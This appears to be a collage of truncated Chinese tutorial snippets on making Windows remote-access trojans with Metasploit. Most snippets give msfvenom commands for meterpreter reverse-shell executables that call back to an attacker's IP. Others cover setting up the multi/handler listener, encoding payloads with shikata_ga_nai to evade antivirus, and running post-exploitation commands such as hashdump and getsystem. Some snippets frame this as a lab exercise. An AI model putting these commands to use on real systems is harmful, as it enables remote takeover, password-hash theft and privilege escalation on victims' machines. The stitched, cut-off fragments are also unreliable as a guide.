提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可 2.生成可执行木马文 命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST =<本地ip> LPORT=<本地端口号> –f exe –o <文件名>.exe 解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址 本地端口自己随便设置一...
一、MSF生成木马上线目标 0x01. 生成木马 使用命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f exe > exp.exe创建一个msf的木马(不免杀版本) 其中-p 后面的内容是使用的payload类型,LHOST是vps的地址,LPORT是端口 0x02. 监听端口 命令:use exploit/multi/handl...
这个就是Kali主机的IP地址 接下来运行命令生成木马 默认生成的文件在根目录下 把刚才生成的文件放到目标靶机Win10系统中 3.运行msfconsole命令 命令:msfconsole 4.配置参数 (1)命令:use exploit/multi/handler(选择模块) (2)命令:set payload windows/meterpreter/reverse_tcp(选择攻击模块) (3)命令:set LhOST 19...
1.利用metasploit生成一个木马。 利用msfvenom生成一个简单的windows木马 命令:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=listen_ip LPORT=listen_port -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe mvfvenom命令行选项 ...
靶机Windows server 2003 192.168.242.129 攻击机kali 192.168.242.131 实验工具:Metasploit Framework(MSF) 实验过程: 确定攻击机和靶机之间连通性 利用msfvenom生成远控木马 msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。
玩的时候要关杀毒软件,不然会杀掉程序的本期视频中的代码: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.7 lport=9999 -f exe -o test.exe msfconsole handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.7 -P 9999 sessions 1...
首先,以管理员权限运行命令:sudo su,确保权限充足。 生成木马文件:msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的Kali IP LPORT=你选择的端口 -f exe -o .exe,将文件放到目标Win10系统。 在msfconsole中配置:use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp...
msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.10.27lport=8888-i3-e x86/shikata_ga_nai-f exe-o test.exe #编码3次 然后会在该目录下生成一个test.exe的木马。 代码语言:javascript 复制 msfvenom-a x86--platform windows-p windows/shell_reverse_tcp-e x86/shikata_ga_nai-i20lhost=192.168...
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4444 -f exe > /root/Desktop/Green_m.exe 这样可以生成一个使用tcp协议反向连接到192.168.1.200的4444端口的meterpreter的后门。 这样生成的exe可以运行,但是会被杀掉。 生成shellcode免杀 ...
run post/windows/gather/hashdump 获取系统密码hash run post/windows/gather/checkvm 检查是否是虚拟机 getprivs#尽可能获取尽可能多的特权 getuid #获得当前的权限 getsystem #通过各种攻击向量将一个管理帐户(通常为本地Administrator账户)提升为本地SYSTEM帐户 ...